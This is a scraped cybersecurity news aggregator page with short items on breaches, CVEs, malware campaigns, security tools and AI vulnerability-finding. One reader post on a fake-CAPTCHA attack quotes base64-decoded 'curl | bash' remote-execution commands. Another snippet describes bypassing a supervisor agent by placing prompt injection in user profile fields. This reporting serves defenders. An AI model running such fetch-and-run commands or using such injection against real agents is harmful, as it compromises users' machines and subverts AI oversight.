The new AI model is being heralded—and feared—as a hacker’s superweapon. Experts say its arrival is a wake-up call for developers who have long made security an afterthought.
Cybersecurity News and Vulnerability Aggregator
Cybersecurity news aggregator
Updated: 7:20 pm
J/K Navigate / Search S Save V Open Link
— or
treemd <(curl -sL https://allsec.sh/md) (as Markdown) Top Cybersecurity Stories Today
Threat actors using a previously undocumented phishing-as-a-service (PhaaS) platform called "VENOM" are targeting credentials of C-suite executives across multiple industries. [...]
Malicious PDFs abuse legit features to harvest system data and decide which victims get a 2nd-stage payload Hackers have been quietly exploiting what appears to be a zero-day in Adobe Acrobat Reader for months, using booby-trapped PDFs to profile targets and decide who's worth fully compromising.…
Hackers gained access to an API for the CPUID project and changed the download links on the official website to serve malicious executables for the popular CPU-Z and HWMonitor tools. [...]
Google says Gmail end-to-end encryption (E2EE) is now available on all Android and iOS devices, allowing enterprise users to read and compose emails without additional tools. [...]
Latest
Friday, April 10
The Blind Spot As organizations race to deploy LLM-powered chat agents, many have adopted a layered defense model: a primary chat agent handles user interactions while a secondary supervisor agent monitors contextual input (i.e., chat messages) for prompt injection attacks and policy violations. This architecture mirrors traditional security patterns like web application firewalls sitting in front of application servers. But what happens when the supervisor only watches the front door? Indirect prompt injection is a class of attack where adversarial instructions are embedded not in the user’s direct input, but in external data sources that an LLM consumes as context: profile fields, retrieved documents, tool outputs, or database records. Unlike direct prompt injection, where a user explicitly sends malicious instructions through the chat interface, indirect injection hides the payload in data that the application fetches on the user’s behalf—often from sources the system implicitly trusts. During a recent engagement targeting a multi-model AI-integrated customer service solution, our team identified a weakness in the architecture that made it susceptible to indirect prompt injection attacks. The customer service solution consisted of an AI-enabled chat agent that processed user requests and a separate supervisor agent that monitored the chat communications for adversarial instructions and manipulation, including prompts injected into data provided to the agent via the chat window. The supervisor agent was effective in consistently detecting and blocking attempts to attack or manipulate the chat agent. However, by injecting adversarial instructions into user profile fields—such as a user’s name—that the chat agent would retrieve upon request, we were able to bypass supervisor protections and trick the chat agent into misinterpreting our user’s profile data as a prompt and executing our hidden instructions. The root cause is a fundamen
The new AI model is being heralded—and feared—as a hacker’s superweapon. Experts say its arrival is a wake-up call for developers who have long made security an afterthought.
Cloudflare’s global network and backbone in 2026. Cloudflare's network recently passed a major milestone: we crossed 500 terabits per second (Tbps) of external capacity. When we say 500 Tbps, we mean total provisioned external interconnection capacity: the sum of every port facing a transit provider, private peering partner, Internet exchange, or Cloudflare Network Interconnect (CNI) port across all 330+ cities. This is not peak traffic. On any given day, our peak utilization is a fraction of that number. (The rest is our DDoS budget.) It’s a long way from where we started. In 2010, we launched from a small office above a nail salon in Palo Alto, with a single transit provider and a reverse proxy you could set up by changing two nameservers . The early days of transit and peering Our first transit provider was nLayer Communications, a network most people now know as GTT. nLayer gave us our first capacity and our first hands-on company experience in peering relationships and the careful balance between cost and performance. From there, we grew city by city : Chicago, Ashburn, San Jose, Amsterdam, Tokyo. Each new data center meant negotiating colocation contracts, pulling fiber, racking servers, and establishing peering through Internet exchanges . The Internet isn't actually a cloud, of course. It is a collection of specific rooms full
Sharing an open-source wireless pentest tool I built called **AutoWIFI**. It wraps aircrack-ng, hashcat, and hcxtools into a single automated workflow. **What it automates:** - Network scanning and target selection - WPA/WPA2 handshake capture - PMKID-based attacks (clientless) - WEP and WPS attacks - GPU-accelerated cracking via hashcat Written in Python. One command takes you from recon to cracking. For authorized penetration testing and security research only. GitHub: https://github.com/momenbasel/AutoWIFI
Anthropic announced to great acclaim (https://www.anthropic.com/glasswing) that its most recent AI frontier model, Mythos, was able to find so many previously undiscovered vulnerabilities in software that we all use that they decided it was too dangerous for humanity to publicly release. Great marketing. And it may be mostly true. Who knows? It is likely another giant step in AI-enabled software finding previously unrevealed software and firmware vulnerabilities known as Zero-Days (or 0-days). It’s something we worried about since the days of early vulnerability finders like SATAN (https://en.wikipedia.org/wiki/Security\_Administrator\_Tool\_for\_Analyzing\_Networks) back in the mid-1990’s. And we’ve been especially worried about it since OpenAI released ChatGPT in late 2022 and started claiming AI-enabled superhuman intelligence was just around the corner. About two months ago, AI finding 0-days started being a popular topic. Nearly every week, we’ve been treated to some AI finding a bunch of 0-days in some popular piece of software. It first started with AI finding over 500 vulnerabilities in open source software in general ([https://medium.com/@ayushghatal8/claude-opus-4-6-found-500-zero-days-and-spooked-wall-street-8b9a5c685860](https://medium.com/@ayushghatal8/claude-opus-4-6-found-500-zero-days-and-spooked-wall-street-8b9a5c685860)) in February. AI then found 12 new vulnerabilities in OpenSSL, which is a super popular open source cryptographic program and library that is probably on every device we own ([https://aisle.com/blog/aisle-discovered-12-out-of-12-openssl-vulnerabilities](https://aisle.com/blog/aisle-discovered-12-out-of-12-openssl-vulnerabilities)). AI analyzed Mozilla Firefox in March ([https://www.anthropic.com/news/mozilla-firefox-security](https://www.anthropic.com/news/mozilla-firefox-security)) and found 22 new vulnerabilities. Then we got Mythos a few days ago. The world is aghast! The mainstream media is hyperventilating. Apocalyptic stories are everywhere. Hide your daughters! Cue people like me telling you not to worry…that the hype is overblown. And it is. I’m sure Mythos is likely another giant step forward in bug finding, but it should be noted that no one involved released the key statistics for any of us to review and see if we really need to be concerned. Yes, it found thousands of vulnerabilities. That’s a good thing. Both attackers and DEFENDERs can now use AI to find bugs that were there and need to get fixed even before the letters AI were in the mix. But we don’t know how often Mythos said something was an exploitable vulnerability and it wasn’t (known as a false-positive). Previous tests have said that false-positive are around 95% of what AI reports. That’s horrible and means that it’s very inefficient and will waste a ton of HUMAN time to resolve. AI-enabled false-positives are so bad that some vendors and maintainers are no longer allowing AI-enabled submissions. Some vendors and maintainers have ended their long-standing public bug bounty programs because they can’t operate with all the submitted false-positive garbage. If Mythos didn’t decrease the percentage of false-positives significantly, it’s less interesting. We also don’t know how often Mythos couldn’t generate a working exploit for the vulnerability it found. Again, past tests and reports say that current AI sucks at exploitation creation and without exploit code successfully demonstrating it can exploit the vulnerability, it means a TON of HUMAN involvement will be needed. Anthropic didn’t share either statistic on Mythos and I think I know why. Because it would not have been good marketing. With that said, I think we will see AI vulnerability-hunting code fix both of those remaining problems…soon. So, whether Mythos has solved them or not isn’t really that crucial. Some AI, or AIs, will…probably not to far out in time. So, we need to prepare as if that is the case. Yes, attackers will use AI to find bugs, including 0-days. This means developers, vendors, and defenders will need to do the same. Developers, vendors, and defenders will do the same. The AI coding apps will get better at making more secure code by default. This is a great thing! We will end up with stronger, more secure code because of it. The bugs are there whether or not AI is finding them. And we need them to be gone. AI is just accelerating what has been a problem from the beginning – insecure programming. How about other outcomes? I have been predicting since last year that we will see over 100K publicly announced vulnerabilities this year (versus 48K last year). Half of this will be from what AI finds and half will be from what AI inserts into newly generated vibe coding. My 100K prediction could be very low. Note: By the way, I asked AI how many vulnerabilities it estimated we would have this year and it said 53K. That’s because it’s looking at the long-term trend data where vulnerability counts go up gradually each year, and it’s not intelligent enough to understand what it is doing to the vulnerability counts. So, expect a big jump in newly found vulnerabilities, either by attackers, defenders, or customers. Big, big jump this year and next. Then basically back to normal or less. Yeah, AI found thousands of vulnerabilities this month. But each next time AI runs on the same software it analyzed before, it will find fewer bugs. It mimics what happens when humans do the same. Each additional run will find incrementally fewer bugs. So, after a huge jump in vulnerability counts, it will probably fall significantly year-over-year for a few years. Then sort of re-gain the normal trajectory it was on. The only unknown is how much code we code. More lines of code mean more bugs, but at the same time, we should have AI creating more secure code. It might be…could be…a self-canceling cycle. But again, I expected fewer bugs over time, at least per thousand lines of code. Defenders will have to adopt AI-enabled hunting tools, like the attackers do, and do the scanning of their environment first. Defenders will need to deploy other offsetting mitigations, such as better intrusion detection and logging. Patching will have to be done faster – likely within hours to days of a new vulnerability being found. The days of having a month or a week to patch are absolutely gone. Welcome to the 21^(st) century. 20th-century processes will not survive. But there will be no apocalypse. Let your daughters out. Don’t get complacent. There are things to do. You do have to respond. But it’s far from hopeless. In fact, business as usual. I do remain a little depressed that we don’t yet have basic patch management figured out. After over 40 years of patching, unpatched software and firmware remain involved in 33% - 40% of all successful hacking. I mourn our humanity that we can’t even get the early basics fixed, much less make the entire Internet far safer than it is today. Although there are solutions (I’ve even written a book, Taming the Hacker Storm) on that. If I were President…
Sharing an open-source SAST tool I built called **VulnHawk**. It uses AI to find vulnerability classes that pattern-matching tools like Semgrep and CodeQL tend to miss - auth bypass, IDOR, and business logic bugs. **How it differs from existing tools:** Traditional SAST tools match syntax patterns. VulnHawk uses LLM-based analysis to understand code semantics, which helps catch logic-level flaws that slip through regex-based rules. **Supports:** Python, JS/TS, Go, PHP, Ruby **CI Integration:** Free GitHub Action available at the GitHub Marketplace - runs on every PR automatically. Open to feedback. If anyone has suggestions for improving detection accuracy or adding language support, PRs are welcome. GitHub: https://github.com/momenbasel/vulnhawk
I got tired of juggling 10 different tools for DFIR, so I spent the last 9 months building an open-source alternative.
Hey everyone, I don't know about you, but I was getting seriously frustrated with how fragmented our tools are. Trying to piece together an investigation across Windows, Linux, and Mac artifacts usually means jumping between half a dozen different apps, and the centralized "all-in-one" solutions cost some money So, about 9 months ago, I decided to just try and build the tool I actually wanted to use. It's called **Heimdall DFIR**. **GitHub:** [https://raiseix.github.io/Heimdall-DFIR](https://raiseix.github.io/Heimdall-DFIR) Instead of a bunch of marketing buzzwords, here is what it actually does right now: * **One giant timeline:** It takes your artifacts (EVTX, MFT, Prefetch and other Windows artifacts Linux/Mac logs, etc.) and merges them into a single chronological grid. I spent a lot of time trying to make the output actually human-readable instead of just dumping raw JSON on the screen * **RAM Analysis:** I hooked it up to VolWeb (Volatility 3). You can upload massive memory dumps directly in the UI and it actually handles the stream without crashing the backend * **Collaborative mode:** Investigating alone sucks, so I added a side-chat and an evidence-pinning system so a team can look at the exact same case simultaneously **To be completely transparent with you all:** This is very much a Beta. It’s a massive undertaking and it’s still missing a lot of features I want to add before calling it a complete platform That’s honestly why I’m sharing it today. I’m hoping to get some brutally honest feedback from people who do this daily. What parsers are you constantly missing in open-source tools? What would make you actually want to use this? If anyone wants to spin it up (Docker compose is ready to go), break it, submit bug reports, or even contribute code to help build this out, I would be incredibly grateful. Let me know what you think. If you like the vision, a GitHub ⭐ helps a lot!
Built a tool that turns live traffic on your machine into a 3D map — IPs show up as nodes, connections as edges, packets animate between them in real time. Good for quickly spotting which hosts are chatty or which connections are active. Needs root/admin, Windows needs Npcap. Not a Wireshark replacement — just a visual way to see what your machine is actually doing.
The attack surface targeted by Iranian-linked hackers in cyberattacks against U.S. critical infrastructure networks includes thousands of Internet-exposed programmable logic controllers (PLCs) manufactured by Rockwell Automation. [...]
Posted by Jiacheng Lu, Software Engineer, Google Pixel Team Google is continuously advancing the security of Pixel devices. We have been focusing on hardening the cellular baseband modem against exploitation. Recognizing the risks associated within the complex modem firmware, Pixel 9 shipped with mitigations against a range of memory-safety vulnerabilities. For Pixel 10, Google is advancing its proactive security measures further. Following our previous discussion on "Deploying Rust in Existing Firmware Codebases" , this post shares a concrete application: integrating a memory-safe Rust DNS(Domain Name System) parser into the modem firmware. The new Rust-based DNS parser significantly reduces our security risk by mitigating an entire class of vulnerabilities in a risky area, while also laying the foundation for broader adoption of memory-safe code in other areas. Here we share our experience of working on it, and hope it can inspire the use of more memory safe languages in low-level environments. Why Modem Memory Safety Can’t Wait In recent years, we have seen increasing interest in the cellular modem from attackers and security researchers. For example, Google's Project Zero gained remote code execution on Pixel modems over the Internet. Pixel modem has tens of Megabytes of executable code. Given the complexity and remote attack surface of the modem, other critical memory safety vulnerabilities may remain in t
Analysis of 1 billion CISA KEV remediation records reveal a breaking point for human-scale security. Qualys shows most critical flaws are exploited before defenders can patch them. [...]
Cybersecurity researchers have flagged yet another evolution of the ongoing GlassWorm campaign, which employs a new Zig dropper that's designed to stealthily infect all integrated development environments (IDEs) on a developer's machine. The technique has been discovered in an Open VSX extension named "specstudio.code-wakatime-activity-tracker," which masquerades as WakaTime, a
Hackers gained access to an API for the CPUID project and changed the download links on the official website to serve malicious executables for the popular CPU-Z and HWMonitor tools. [...]
I wanted to share a bit of my story in cybersecurity, because it’s probably not a typical one. Today I work with cybersecurity, vulnerabilities, and digital security research. But the detail that surprises most people is that I’m completely blind. I wasn’t always fully blind. I was born extremely premature, at only six months of gestation. There were serious complications during the birth and my survival was considered almost a miracle. Two days after I was born I needed heart surgery, and doctors discovered that my left eye was already blind because the optic pathway between the eye and the brain had not developed correctly. For a while I could still see partially with my right eye, around 80–90%. But I later developed cataracts and by the time I was nine years old I had completely lost my vision. Technology entered my life very early. I learned to read when I was three. In school I was introduced to a resource room where I discovered DOSVOX, a system created in Brazil to help blind people use computers. Even before that I loved technology. I used to play video games entirely by sound and actually won some competitions that way. When I was around ten years old I started using computers more seriously. I began building small websites and experimenting with programming. By fourteen I was studying programming more deeply. By seventeen I discovered cybersecurity and became fascinated with understanding how systems break, how vulnerabilities appear, and how attackers think. One of the biggest tools that made this possible for me is something called a screen reader. For those who don’t know, a screen reader is software that reads everything on the computer out loud. On Windows I mainly use NVDA (NonVisual Desktop Access), which is open source. Over time I even contributed to the community by developing two add-ons that improve accessibility for programs like Word, Excel, and Microsoft Teams. The path into cybersecurity wasn’t easy. Many security tools were not designed with accessibility in mind. Documentation is often very visual. Security labs and platforms sometimes assume you can see everything on the screen. So a lot of my learning process involved adapting tools, creating alternative workflows, and sometimes figuring things out in ways that weren’t originally intended. Eventually I graduated in Cyber Defense and later completed multiple postgraduate specializations in cybersecurity. Today I hold dozens of certifications and work with vulnerability research, digital security, and accessible technology. One milestone that meant a lot to me was discovering and reporting a vulnerability that became officially registered in the NVD (National Vulnerability Database) maintained by the U.S. government. As far as I know, I was the first completely blind cybersecurity professional to do that. I also wrote a book called “Digital Scams: How to Protect Yourself in the Internet Era”, published in Portuguese and English, to help people understand online fraud and protect themselves. Beyond the technical side, one of my biggest missions is promoting inclusion in cybersecurity. I truly believe people with disabilities can bring unique perspectives to the field. Security is about thinking differently about systems, risks, and failures — and diverse experiences can strengthen that. More recently I’ve been quoted in international articles discussing AI and cybersecurity risks, which was another meaningful moment for me. Not just personally, but because it shows that accessibility barriers in technology can be challenged. If my journey helps inspire even one more person with a disability to enter technology or cybersecurity, then it’s worth sharing. I’m always open to connecting with people in the security community. I’m also available to collaborate on reports, interviews, articles, podcasts, or research related to cybersecurity, accessibility in technology, AI security, and digital threats. LinkedIn: [https://www.linkedin.com/in/juan-mathews-rebello-santos-/](https://www.linkedin.com/in/juan-mathews-rebello-santos-/)
A financially motivated threat actor tracked as Storm-2755 is stealing Canadian employees' salary payments after hijacking their accounts in payroll pirate attacks. [...]
Keyloggers: A Persistent Threat Nowadays, virtually all digital services rely on logins and authentication, from email inboxes to help desks. These involve login credentials to prove identity, typically at least a username and a password. Initially, this information is confidential from a potential attacker. Whi
Just what FOSS developers need – a flood of AI-discovered vulnerabilities Opinion Anthropic describes Project Glasswing as a coalition of tech giants committing $100 million in AI resources to hunt down and fix long-hidden vulnerabilities in critical open source software that it's finding with its new Mythos AI program. Or as The Reg put it , "an AI model that can generate zero-day vulnerabilities."…
Four-week call for evidence intended to help shape laws aimed at devices linked to crime The UK government is seeking views on radiofrequency jammers as it prepares legislation to ban the controversial devices.…
While much of the discussion on AI security centers around protecting ‘shadow’ AI and GenAI consumption, there's a wide-open window nobody's guarding: AI browser extensions. A new report from LayerX exposes just how deep this blind spot goes, and why AI extensions may be the most dangerous AI threat surface in your network that isn't on anyone's
I recently came across an interesting example of a social engineering attack targeting developers. The flow is as follows: 1. A user opens what appears to be a harmless developer-related file (e.g., something like a copilot instructions file). (copilot-instructions.md file but as a link) 2. Instead of content, a “Verify your identity” page is shown (fake CAPTCHA-style UI). 3. The page instructs the user to: * Open Spotlight * Launch Terminal * Paste clipboard contents and execute NOTE: That page was shown when i clicked on [copilot-instructions.md](http://copilot-instructions.md) link. The key detail is that the page **silently injects a command into the clipboard**. When pasted, it resolves to a pattern similar to: echo "<base64>" | base64 -d | bash Which further resolves to: curl -s <remote_script> | bash This effectively tricks the user into executing arbitrary remote code. Notably: * The attack relies on user trust and habitual actions (Cmd+V) * The payload is obfuscated via base64 * The UI mimics legitimate verification flows This seems like a targeted approach toward developers rather than generic users. Curious if others have observed similar campaigns or variations of this technique.
Google says Gmail end-to-end encryption (E2EE) is now available on all Android and iOS devices, allowing enterprise users to read and compose emails without additional tools. [...]
Static analysis of iOS App Store binaries: common vulnerabilities I keep finding after 15 years in mobile security
I've been doing iOS security assessments professionally for about 15 years — banking apps, fintech, enterprise platforms. Over that time, certain patterns keep showing up in production App Store binaries. Figured it's worth sharing what I see most frequently, since many iOS developers seem genuinely unaware these issues exist. **What keeps showing up:** The most common finding is hardcoded secrets in the binary — API keys, backend URLs, authentication tokens sitting right there in plaintext strings. Developers assume compilation somehow obscures these. It doesn't. Extracting them is trivial with standard tooling. Insecure local data storage is a close second. UserDefaults for sensitive data, unprotected Core Data databases, plist files with session tokens. On a jailbroken device (or via backup extraction on a non-jailbroken one), all of this is readable. Weak or misconfigured encryption comes third. I regularly find apps that import CryptoKit or CommonCrypto but use ECB mode, hardcoded IVs, or derive keys from predictable inputs. The encryption is technically present but functionally useless. Then there's the network layer: disabled ATS exceptions, certificate pinning that's implemented but trivially bypassable, and HTTP endpoints mixed with HTTPS. **Methodology:** Most of this comes from static analysis — no runtime instrumentation needed. Download the IPA, unpack, run string extraction, inspect the Mach-O binary, check plist configurations, review embedded frameworks. You'd be surprised how much is visible before you even launch the app. I've built custom tooling for this over the years that automates the initial triage across \~47 check categories. Happy to discuss methodology or specific techniques in comments. I've also been running a monthly live session ("iOS App Autopsy") where I walk through this process on real apps — follow the link if interested.
Built an open-source Distributed Deception Hub (Micro-SIEM) to replace noisy alerts with high-fidelity tripwires. Looking for operational feedback.
Hey everyone, I’ve been working on a project to get better visibility into internal networks (homelabs/SMBs), and I looked into solutions like Wazuh, but got tired of the traditional SIEM approach. Collecting gigabytes of legitimate traffic logs, and constantly tuning out false positives felt like a massive resource drain for small environments. But i still wanted a low maintenance solution for my LAN. So, I built an open-source alternative called HoneyWire. Instead of the "magnifying glass" approach, it uses a tripwire model. If a sensor trips, it’s not a misconfiguration it’s an active threat or lateral movement. Instead of looking at everything that goes through a door, set up a fake one if something goes through it, it's an anomaly and should be looked at, or set up specific tripwire sensors on existing doors that should not be accessed normally. It's basically an alarm system for your LAN. It’s completely free and open-source. I built it to solve my own visibility problems, but I want to share it because it might solve the same problem to someone else. I would love feedback from people who have more experience then me: * **The Concept**: In your day-to-day, is a dedicated deception/tripwire hub actually useful for early-warning, or do you prefer the "collect everything" approach of a standard SIEM? * **The Sensors**: It currently has official Go binaries for Tarpits, Network Scan Detectors, ICMP Canaries, Web Router login page Decoy and File Canaries. What other sensor types are must-haves? * **The Standard**: It has a "Bring Your Own Sensor" universal JSON standard so you can write a decoy in any language and the Hub will parse it. Is this something useful or is it just a security blunder? (every official sensor is written in GO but this allows users to develop their own) * **The Gaps**: What am i missing that would prevent you from deploying this in a lab or SMB environment? Here is the GitHub repo: [https://github.com/andreicscs/HoneyWire](https://github.com/andreicscs/HoneyWire) Roast the architecture, the backend, the UI, or the core concept. I'd rather know where the blind spots are now. Thanks!
Cut through the noise and understand the real risks, responsibilities, and responses shaping enterprise AI today. Webinar Promo 2025 was the year of AI experimentation. In 2026, the bills are coming due. AI adoption has moved from isolated pilots to autonomous, enterprise wide deployment, bringing with it a sophisticated new generation of security challenges.…
A critical security vulnerability in Marimo, an open-source Python notebook for data science and analysis, has been exploited within 10 hours of public disclosure, according to findings from Sysdig. The vulnerability in question is CVE-2026-39987 (CVSS score: 9.3), a pre-authenticated remote code execution vulnerability impacting all versions of Marimo prior to and including
Unknown threat actors have hijacked the update system for the Smart Slider 3 Pro plugin for WordPress and Joomla to push a poisoned version containing a backdoor. The incident impacts Smart Slider 3 Pro version 3.5.1.35 for WordPress, per WordPress security company Patchstack. Smart Slider 3 is a popular WordPress slider plugin with more than 800,000 active installations across its free and Pro
Thursday, April 9
A new Lua-based malware, called LucidRook, is being used in spear-phishing campaigns targeting non-governmental organizations and universities in Taiwan. [...]
Threat actors using a previously undocumented phishing-as-a-service (PhaaS) platform called "VENOM" are targeting credentials of C-suite executives across multiple industries. [...]
Dutch healthcare software vendor ChipSoft has been impacted by a ransomware attack that forced the company to take offline its website and digital services for patients and healthcare providers. [...]
Google has rolled out Device Bound Session Credentials (DBSC) protection in Chrome 146 for Windows, designed to block info-stealing malware from harvesting session cookies. [...]
Cops bust latest scam, return $12m to bilked victims US, UK, and Canadian law enforcement Thursday said that they disrupted a $45 million global cryptocurrency scam, freezing $12 million in stolen funds and identifying more than 20,000 cryptocurrency wallet addresses linked to fraud victims across 30 countries.…
Anthropic’s Mythos announcement marks a genuine inflection point in the threat landscape. And for those of us who have spent careers watching it evolve, this one feels different. Building a reliable working exploit used to take a skilled attacker the better part of a year. With AI-powered offensive tooling, we’re looking at potentially days. That […] The post Mythos Changes Everything: Why Your Entire Attack Surface Is Now at Risk appeared first on Synack .
Details have emerged about a now-patched security vulnerability in a widely used third-party Android software development kit (SDK) called EngageLab SDK that could have put millions of cryptocurrency wallet users at risk. "This flaw allows apps on the same device to bypass Android security sandbox and gain unauthorized access to private data," the Microsoft Defender
Possible link to Mr. Raccoon's claimed Adobe break-in A new extortion crew has targeted “several dozen high-value” corporations through phishing and helpdesk social-engineering, according to Google.…
Posted by Ben Ackerman, Chrome team, Daniel Rubery, Chrome team and Guillaume Ehinger, Google Account Security team Following our April 2024 announcement , Device Bound Session Credentials (DBSC) is now entering public availability for Windows users on Chrome 146, and expanding to macOS in an upcoming Chrome release. This project represents a significant step forward in our ongoing efforts to combat session theft, which remains a prevalent threat in the modern security landscape. Session theft typically occurs when a user inadvertently downloads malware onto their device. Once active, the malware can silently extract existing session cookies from the browser or wait for the user to log in to new accounts, before exfiltrating these tokens to an attacker-controlled server. Infostealer malware families, such as LummaC2, have become increasingly sophisticated at harvesting these credentials. Because cookies often have extended lifetimes, attackers can use them to gain unauthorized access to a user’s accounts without ever needing their passwords; this access is then often bundled, traded, or sold among threat actors. Crucially, once sophisticated malware has gained access to a machine, it can read the local files and memory where browsers store authentication cookies. As a result, there is no reliable way to prevent cookie exfiltration using software alone on any operating system. Historically, mitigating session theft relied on detecting the stolen credentials after the fact using a complex set of abuse heuristics – a reactive approach that persistent attackers could often circumvent. DBSC fundamentally changes the web's capability to defend against this threat by shifting the paradigm from reactive detection to proactive prevention, ensuring that successfully exfiltrated c
Threat Model Discrepancy: Google Password Manager leaks cleartext passwords via Task Switcher (Won't Fix) - Violates German BSI Standards
Hi everyone, I’m a Cybersecurity student at HFU in Germany and recently submitted a vulnerability to the Google VRP regarding the Google Password Manager on Android (tested on Pixel 8, Android 16). **The Issue:** When you view a cleartext password in the app and minimize it, the app fails to apply `FLAG_SECURE` or blur the background. When opening the "Recent Apps" (Task Switcher), the cleartext password is fully visible in the preview, *even though* the app actively overlays a "Enter your screen lock" biometric prompt in the foreground. It basically renders its own secondary biometric lock completely useless. **Google's Response:** Google closed the report as *Won't Fix (Intended Behavior)*. Their threat model assumes that if an attacker has physical access to an unlocked device, it's game over. **The BSI Discrepancy:** What makes this interesting is that the German Federal Office for Information Security (BSI) recently published a study on Password Managers. In their Threat Model A02 ("Attacker has temporary access to the unlocked device"), they explicitly mandate that sensitive content MUST be protected from background snapshots/screenshots. So while Google says this is intended, national security guidelines classify this as a vulnerability. (For comparison: The iOS built-in password manager instantly blurs the screen when losing focus). Here is my PoC screenshot: [https://drive.google.com/file/d/1PTGKRpyFj\_jY9S76Jlo62mSCDJ3c6uLO/view?usp=sharing](https://drive.google.com/file/d/1PTGKRpyFj_jY9S76Jlo62mSCDJ3c6uLO/view?usp=sharing) [https://drive.google.com/file/d/1nIJMQbM4R17EMt9f1Ffb4UmCPYY7-GXb/view?usp=sharing](https://drive.google.com/file/d/1nIJMQbM4R17EMt9f1Ffb4UmCPYY7-GXb/view?usp=sharing) What are your thoughts on this? Should password managers protect against shoulder surfing via the Task Switcher, or is Google right to rely solely on the OS lockscreen?
UK and US customers stuck waiting after fleet management SaaS vendor took affected environments offline A cybersecurity incident has knocked FleetWave into a "major outage" across the UK and US after Chevin Fleet Solutions pulled parts of its SaaS platform offline and left customers scrambling for answers.…
Overview Multiple vulnerabilities have been identified in Orthanc DICOM Server version, 1.12.10 and earlier, that affect image decoding and HTTP request handling components. These vulnerabilities include heap buffer overflows, out-of-bounds reads, and resource exhaustion vulnerabilities that may allow attackers to crash the server, leak memory contents, or potentially execute arbitrary code. Description Orthanc is an open-source lightweight Digital Imaging and Communications in Medicine (DICOM) server used to store, process, and retrieve medical imaging data in healthcare environments. The following nine vulnerabilities identified in Orthanc primarily stem from unsafe arithmetic operations, missing bounds checks, and insufficient validation of attacker-controlled metadata in DICOM files and HTTP requests. CVE-2026-5437 An out-of-bounds read vulnerability exists in DicomStreamReader during DICOM meta-header parsing. When processing malformed metadata structures, the parser may read beyond the bounds of the allocated metadata buffer. Although this issue does not typically crash the server or expose data directly to the attacker, it reflects insufficient input validation in the parsing logic. CVE-2026-5438 A gzip decompression bomb vulnerability exists when Orthanc processes an HTTP request with Content-Encoding: gzip . The server does not enforce limits on decompressed size and allocates memory based on attacker-controlled compression metadata. A specially crafted gzip payload can trigger excessive memory allocation and exhaust system memory. CVE-2026-5439 A memory exhaustion vulnerability exists in ZIP archive processing. Orthanc automatically extracts ZIP archives uploaded t
Malicious PDFs abuse legit features to harvest system data and decide which victims get a 2nd-stage payload Hackers have been quietly exploiting what appears to be a zero-day in Adobe Acrobat Reader for months, using booby-trapped PDFs to profile targets and decide who's worth fully compromising.…
Stolen credentials turn authentication systems into the attack surface. Token shows how wearable biometric authentication verifies the user—not the session—blocking phishing relays and MFA bypass. [...]
No emails, no warnings, no humans – just bots, catch-22s, and a 60-day appeals queue Microsoft says that it will work on how it communicates with developers after two leading open source figures were suddenly locked out of their accounts, leaving them unable to sign updates.…
Security researchers tricked Apple Intelligence into cursing at users. It could have been a lot worse
Wash your mouth out with digital soap Apple Intelligence, the personal AI system integrated into newer Macs, iPhones, and other iThings, can be hijacked using prompt injection, forcing the model into producing an attacker-controlled result and putting millions of users at risk, researchers have shown.…
Thursday. Another week, another batch of things that probably should've been caught sooner but weren't. This one's got some range — old vulnerabilities getting new life, a few "why was that even possible" moments, attackers leaning on platforms and tools you'd normally trust without thinking twice. Quiet escalations more than loud zero-days, but the kind that matter more in
Attackers slipped into the process and redirected funds, leaving the company scrambling to recover the cash UK-listed oil and gas outfit Zephyr Energy plc has admitted a cyber incident siphoned off roughly £700,000 after a single payment to a contractor was quietly redirected to an attacker-controlled account.…
As AI tools become more accessible, employees are adopting them without formal approval from IT and security teams. While these tools may boost productivity, automate tasks, or fill gaps in existing workflows, they also operate outside the visibility of security teams, bypassing controls and creating new blind spots in what is known as shadow AI. While similar to the phenomenon of
We added a new chapter to our Testing Handbook: a comprehensive security checklist for C and C++ code . We’ve identified a broad range of common bug classes, known footguns, and API gotchas across C and C++ codebases and organized them into sections covering Linux, Windows, and seccomp. Whereas other handbook chapters focus on static and dynamic analysis, this chapter offers a strong basis for manual code review. LLM enthusiasts rejoice: we’re also developing a Claude skill based on this new chapter. It will turn the checklist into bug-finding prompts that an LLM can run against a codebase, and it’ll be platform and threat-model aware. Be sure to give it a try when we release it. And after reading the chapter, you can test your C/C++ review skills against two challenges at the end of this post. Be in the first 10 to submit correct answers to win Trail of Bits swag! What’s in the chapter The chapter covers five areas: general bug classes, Linux usermode and kernel, Windows usermode and kernel, and seccomp/BPF sandboxes. It starts with language-level issues in the bug classes section—memory safety, integer errors, type confusion, compiler-introduced bugs—and gets progressively more environment-specific. The Linux usermode section focuses on libc gotchas. This section is also applicable to most POSIX systems. It ranges from well-known problems with string methods, to somewhat less known caveats around privilege dropping and environment variable handling. The Linux kernel is a complicated beast, and no checklist could cover even a part of its intricacies. However, our new Testing Handbook chapter can give you a starting point to bootstrap manual reviews of drivers and modules.
An apparent hack-for-hire campaign likely orchestrated by a threat actor with suspected ties to the Indian government targeted journalists, activists, and government officials across the Middle East and North Africa (MENA), according to findings from Access Now, Lookout, and SMEX. Two of the targets included prominent Egyptian journalists and government critics, Mostafa
Eurail B.V., a European travel operator that provides digital passes covering 33 national railways, says attackers stole the personal information of over 300,000 individuals in a December 2025 data breach. [...]
Political candidates are purchasing more home alarms, bulletproof vests, and other protections amid rising fears of political violence.
Even fitness equipment is vulnerable to mischief makers these days PWNED Welcome back to Pwned, the column where we share war stories from IT soldiers who shot themselves – or watched someone else shoot themselves – in the foot. Today's tale shows that even when you're setting up something as simple as fitness gear, there's no excuse for leaving security credentials lying around.…
Bitcoin Depot, which operates one of the largest Bitcoin ATM networks, says attackers stole $3.665 million worth of Bitcoin from its crypto wallets after breaching its systems last month. [...]
The time is maybe Quantum computing exists in a sort of superposition with regard to cryptography – it's both a pending threat and a technology of no immediate consequence for decryption.…
A look at how Kubernetes CVE-2020-8562 allows attackers to bypass API server proxy protections using DNS rebinding
Public blockchains solved settlement. They didn't solve privacy. Institutions need to protect positions, counterparty relationships, and transaction amounts without abandoning transparency entirely - and every architecture that tried to solve this hit the same wall. Protocol-level privacy locks everything. Permissioned chains recreate centralization. Separate privacy layers fragment liquidity. Stellar's answer is different. Cryptographic primitives baked into the base layer, two production-ready privacy models on top, and the institution decides what to reveal and to whom. Transparent when you want it. Private when you need it.
Wednesday, April 8
If they don't know what they're doing, you might never get your data back interview It's the biggest threat today, but it took her a while to appreciate it. After spending two decades at the FBI and much of that time working to intercept and stop cyber threats from the likes of China and Russia, Halcyon Ransomware Research Center SVP Cynthia Kaiser says she was a "latercomer to really wanting to focus on ransomware."…
